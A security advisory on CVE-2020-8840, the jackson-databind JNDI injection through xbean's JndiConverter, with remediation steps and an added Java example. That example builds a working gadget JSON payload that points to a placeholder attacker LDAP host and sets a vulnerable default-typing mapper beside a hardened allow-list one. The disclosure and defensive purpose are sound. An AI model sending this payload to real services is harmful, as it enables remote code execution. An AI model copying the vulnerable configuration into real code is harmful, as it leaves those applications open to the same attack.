
[Vulnerability Notice] CVE-2020-8840 / jackson-databind JNDI injection leading to remote code execution

Vulnerability description

Recently, the AsiaInfo Security network attack and defense lab (亚信安全网络攻防实验室) observed that jackson-databind had added another class to its JNDI-injection blacklist and released a new version, 2.8.11.5. The blacklist is the only thing standing between attacker-supplied JSON and arbitrary class instantiation when an application deserializes untrusted input with default typing enabled. If the jar containing the newly blocked class is present on the project's classpath and the JDK version still allows JNDI to load classes from a remote codebase, that class can be used for JNDI injection and therefore remote code execution.

Vulnerability ID

CVE-2020-8840

Threat level

Medium

Unaffected versions

2.8.11.5 (on the 2.9 branch, the corresponding fixed release is 2.9.10.3)

Verification

The relatively recent version 2.10.1 was chosen for comparison here.

[Screenshot: diff of the jackson-databind blacklist between versions; image not reproduced]

The main addition is the class org.apache.xbean.propertyeditor.JndiConverter.

Speaking of jackson-databind, one naturally thinks of Alibaba's open-source fastjson, which has the same polymorphic-deserialization problem when autotype is enabled.

So we tried JNDI injection against fastjson using this same class.

[Screenshot: JNDI injection attempt against fastjson with the JndiConverter class; image not reproduced]

With autotype enabled, the class successfully bypasses fastjson 1.2.62 (the latest version at the time of writing).

Remediation

  • 1. Update jackson-databind to the latest release (2.8.11.5 or later on the 2.8 branch), and do not enable default typing on untrusted input.
  • 2. Use a recent JDK, whose JNDI implementation no longer loads classes from remote codebases by default.
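The following is an added example and is not code from the advisory or from the jackson project. It shows the mapper configuration under which CVE-2020-8840 is reachable (enableDefaultTyping(), whose only protection is the blacklist that older versions lacked JndiConverter in) next to the 2.10+ allow-list configuration that refuses the type before any object is created. The JSON payload is constructed here in jackson's default-typing array form; the LDAP URL, the package prefix com.example.model. and the class name JndiGadgetDemo are placeholders, and the vulnerable path is shown but not executed.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;

public class JndiGadgetDemo {

    // Constructed payload, not taken from the advisory. With default typing on,
    // jackson accepts ["<class name>", {<bean properties>}] for an Object target.
    // "asText" maps to setAsText(String) on xbean's AbstractConverter, which
    // JndiConverter implements as an InitialContext.lookup() of the string.
    // The host is a placeholder under the reserved .invalid TLD.
    static final String PAYLOAD =
        "[\"org.apache.xbean.propertyeditor.JndiConverter\","
      + " {\"asText\": \"ldap://attacker.invalid:1389/x\"}]";

    // BEFORE: the configuration the vulnerability needs. enableDefaultTyping()
    // lets the JSON name any class on the classpath; the only defence is the
    // built-in blacklist, which did not contain JndiConverter before 2.8.11.5 /
    // 2.9.10.3. The method is deprecated in 2.10 but still available.
    @SuppressWarnings("deprecation")
    static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        return mapper;
    }

    // AFTER: an allow-list instead of a blacklist. Since 2.10, default typing
    // must be activated with a PolymorphicTypeValidator; only subtypes under
    // the application's own package prefix are resolvable, so a gadget class
    // from xbean-reflect is rejected before it is instantiated.
    static ObjectMapper hardenedMapper() {
        return new ObjectMapper().activateDefaultTyping(
            BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")   // placeholder prefix
                .build(),
            ObjectMapper.DefaultTyping.NON_FINAL);
    }

    // Returns true when the mapper refuses the type id in PAYLOAD without
    // creating the object, which is the behaviour we want.
    static boolean rejectsGadget(ObjectMapper mapper) throws Exception {
        try {
            mapper.readValue(PAYLOAD, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            System.out.println("type id denied: " + e.getTypeId());
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened mapper rejects gadget: " + rejectsGadget(hardenedMapper()));
        // Deliberately not run: on an unpatched jackson-databind with
        // xbean-reflect on the classpath, vulnerableMapper().readValue(PAYLOAD,
        // Object.class) would instantiate JndiConverter and call setAsText(),
        // i.e. perform the JNDI lookup against the attacker-controlled URL.
    }
}
```

The fix on the jackson side is a longer blacklist; the fix on the application side is to stop relying on a blacklist at all, either by not enabling default typing for untrusted input or by restricting it with a validator as above. Updating the JDK closes the remote-codebase path the lookup depends on, but does not stop the lookup itself, so it is a second layer rather than a substitute for the dependency update.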

Timeline

[0] 2020/02/19 NVD publishes the security advisory
[1] 2020/02/21 AsiaInfo Security network attack and defense lab analyzes and reproduces the vulnerability and publishes this notice

Reference

https://nvd.nist.gov/vuln/detail/CVE-2020-8840
